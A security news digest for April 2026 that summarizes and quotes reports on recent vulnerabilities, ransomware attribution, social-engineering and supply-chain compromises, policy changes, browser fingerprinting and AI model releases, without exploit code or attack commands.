Sign in Subscribe

InfoSec News 07APR2026

General

  • New zero-day Elevation of Privilege (EoP) vulnerability in Microsoft Windows. Looking at the source code, it appears to be hooking Windows Defender's update process, waiting for it to create a new directory, moving in its own files, then triggering a detection with the EICAR file.
Will Dormann, principal vulnerability analyst at Tharros (formerly Analygence), confirmed to BleepingComputer that the BlueHammer exploit works, saying that the flaw is a local privilege escalation (LPE) that combines a TOCTOU (time-of-check to time-of-use) and a path confusion.
He explained that the issue is not easy to exploit and that it gives a local attacker access to the Security Account Manager (SAM) database, which contains password hashes for local accounts.
Given this access, attackers can escalate to SYSTEM privileges and potentially achieve complete machine compromise.
An Improper Access Control vulnerability [CWE-284] in FortiClient EMS may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.
Fortinet has observed this to be exploited in the wild and urges vulnerable customers to install the hotfix for FortiClient EMS
The researchers demonstrated that Rowhammer-induced bit flips in GDDR6 can corrupt GPU page tables (PTEs) and grant arbitrary GPU memory read/write access to an unprivileged CUDA kernel.
An attacker may then chain this into a CPU-side escalation by exploiting memory-safety bugs in the NVIDIA driver, potentially leading to complete system compromise without the need to disable Input-Output Memory Management Unit (IOMMU) protection.
Shchukin was named as UNKN (a.k.a. UNKNOWN) in an advisory published by the German Federal Criminal Police (the “Bundeskriminalamt” or BKA for short).
...
Germany’s BKA said Shchukin acted as the head of one of the largest worldwide operating ransomware groups GandCrab and REvil, which pioneered the practice of double extortion — charging victims once for a key needed to unlock hacked systems, and a separate payment in exchange for a promise not to publish stolen data.
...
The Gandcrab ransomware affiliate program first surfaced in January 2018, and paid enterprising hackers huge shares of the profits just for hacking into user accounts at major corporations.
...
On May 31, 2019, the GandCrab team announced the group was shutting down after extorting more than $2 billion from victims.
...
The REvil ransomware affiliate program materialized around the same as GandCrab’s demise, fronted by a user named UNKNOWN
...
A reader forwarded this English-dubbed audio recording from the a ccc.de (37C3) conference talk in Germany from 2023 that previously outed Shchukin as the REvil leader (Shchuckin is mentioned at around 24:25).
The NFC scanning lets the bank onboard customers with a single document.
...
For the verification, the ePassport biometric, the chip photo, is matched against a customer selfie during onboarding, and neither image is retained.
...
While the technology is emerging in the Australian market, overseas retail banks have used NFC ePassport scanning for KYC onboarding for several years now.
they scheduled a meeting with me to connect. the meeting was on ms teams. the meeting had what seemed to be a group of people that were involved.
the meeting said something on my system was out of date. i installed the missing item as i presumed it was something to do with teams, and this was the RAT.
In or about Fall 2025, Drift contributors were approached by a group of individuals at a major crypto conference who presented as a quantitative trading firm looking to integrate on the protocol. It is now understood that this appears to be a targeted approach, where individuals from this group continued to deliberately seek out and engage specific Drift contributors, in person, at multiple major industry conferences in multiple countries over the following six months.
...
Integration conversations continued through February and March 2026. Various Drift contributors met individuals from this group again, face-to-face, at multiple major industry conferences.
...
Throughout all of this, links were shared for projects, tools, and apps they claimed to be building, which was standard practice for trading firms.
...
One contributor may have been compromised after cloning a code repository shared by the group under the guise of deploying a frontend for their vault.
A second contributor was induced to download a TestFlight application the group presented as their wallet product.
...
With medium-high confidence supported by investigations... this operation is assessed to have been carried out by the same threat actors responsible for the October 2024 Radiant Capital hack attributed by Mandiant to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet.
...
Mandiant has not formally attributed this Drift exploit.
What makes TasksJacker novel isn't just its scale—it's the attack vector. By weaponizing VS Code's tasks.json auto-execution feature, attackers have created a scenario where simply opening a cloned repository in your IDE can compromise your system. No user interaction required beyond a git clone and opening the folder.
  • Another potential TeamPCP / ShinyLapsusHunters (specifically - ShinyHunters this time) link. The European Commission's AWS tenancy breach is being attributed to TeamPCP (via the Trivy supply-chain attack), however ShinyHunters have claimed to have stolen the data.
CERT-EU believes with high confidence that the hackers initially gained access through the Trivy supply chain compromise, which has been attributed to the hacking group TeamPCP.
...
The researchers believe the hack can be attributed to the Trivy compromise because of its timing, the resources that were targeted and the fact that the Commission was “unwittingly using a compromised version of Trivy during the relevant timeframe, having received it through normal software update channels.”
...
On March 28, the stolen data turned up on the ShinyHunters’ dark web site. The incident is likely the latest example of cybercriminal organizations working together to make money off of hacks.

Getting Techy

  • WatchTowr Labs have been busy - this time digging into the fertile grounds of enterprise file-sharing platforms, with Progress ShareFile.
If you squint and look at the CISA KEV list, you might think it's made up exclusively of vulnerabilities in file transfer solutions.
While this would be wrong (and you shouldn’t squint, it’s bad for your eyes), file transfer solutions do play a decent role in the CISA KEV list due to how fondly threat actors, APT groups, and ransomware gangs alike perceive them.
...
In this post, we’ll walk through vulnerabilities we discovered in Progress ShareFile that allowed us to achieve pre-auth RCE on what was, at the time of research, fully patched to latest.

Geo-Politics

  • [FR] France seems to be the next to implement a social-media ban for teenagers - under 15's in this case.
The French Senate voted in favor of a social media ban for children under age 15, putting the country on track to potentially be the first European nation to follow Australia's lead in passing such a law.
...
The Senate bill is different and creates a system that divides platforms into two categories. One category would be designated for platforms believed to cause “physical, mental or moral development" to children. An outright ban would apply to those platforms.
The second category would be for platforms found to be less detrimental that can be used by children under 15 whose parent's consent.
The disruption on Friday affected apps from some of the country’s largest banks, including Sberbank, VTB, Alfa-Bank, T-Bank and Gazprombank.
...
The exact cause of the outage remains unclear, but several Russian media outlets, including Forbes Russia, initially suggested it could be linked to government attempts to block internet resources, specifically the blocking of IP addresses used in banking infrastructure.
...Natalia Kasperskaya, co-founder of cybersecurity company Kaspersky Lab, wrote on Telegram on Saturday that she believed the issues were caused by Roskomnadzor’s attempts to block VPN services.
“This is not an enemy raid or an attack by external actors or malicious foreign hackers,” she wrote. “This is our very own Roskomnadzor finally getting serious about fighting traffic tunneling and protection services, also known as VPNs.”
The US Cybersecurity and Infrastructure Security Agency's budget will see yet another deep cut if Congress approves President Trump's proposal to slash CISA's spending by $707 million in fiscal year 2027.
...
Trump's fiscal 2026 budget wanted to chop about $491 million from CISA's spending, although Congress ultimately approved a reduction of about $135 million
...
Both Noem and Trump frequently criticized CISA's efforts to counter online disinformation, especially as they relate to election security and preventing foreign trolls – and the president himself – from spreading lies that the 2020 presidential election was stolen on behalf of Joe Biden.
...
On Trump's first day of his second term, he axed the Cyber Safety Review Board, which had been investigating how China's Salt Typhoon hacked US government and telecommunications networks, along with all other advisory committees that reported to the Department of Homeland Security.

Privacy

  • Microsoft's LinkedIn is scanning visitor's browsers for thousands of extensions. It claims to be doing this to prevent extensions from scraping the site.
LinkedIn does not dispute that it detects specific browser extensions, telling BleepingComputer that the info is used to protect the platform and its users.
However, the company claims the report is from someone whose account was banned for scraping LinkedIn content and violating the site's terms of use.
...
Regardless of the reasons for the report, one point is undisputed.
LinkedIn's site uses a fingerprinting script that detects over 6,000 extensions running in a Chromium browser, along with other data about a visitor's system.

AI

  • Google DeepMind have released the next iteration of their Gemma series of models. They come in a range of sizes - 2b, 4b, 31b and 26b Mixture of Experts (MoE) with 4b active. The MoE model should be quite quick to run. The smaller models (2b/4b) have a 128k token window, the larger models (26b/31b) have a 256k token context window.
    The quoted benchmarks appear to be quite a step-up from Gemma 3, including LiveCodeBench - from 29% to 80% (even 2b rates at 44%).
    Google have also released an app to run the smaller models directly on iPhones.
We are releasing Gemma 4 in four versatile sizes: Effective 2B (E2B), Effective 4B (E4B), 26B Mixture of Experts (MoE) and 31B Dense. The entire family moves beyond simple chat to handle complex logic and agentic workflows. Our larger models deliver state-of-the-art performance for their sizes, with the 31B model currently ranking as the #3 open model in the world on the industry-standard Arena AI text leaderboard, and the 26B model securing the #6 spot. There, Gemma 4 outcompetes models 20x its size.
Earlier this week, OpenClaw developers released security patches for three high-severity vulnerabilities. The severity rating of one in particular, CVE-2026-33579, is rated from 8.1 to 9.8 out of a possible 10 depending on the metric used—and for good reason. It allows anyone with pairing privileges (the lowest-level permission) to gain administrative status. With that, the attacker has control of whatever resources the OpenClaw instance does.

Subscribe to Deuxieme RE Banque News

Sign up now to get access to the library of members-only issues.
Jamie Larson
Subscribe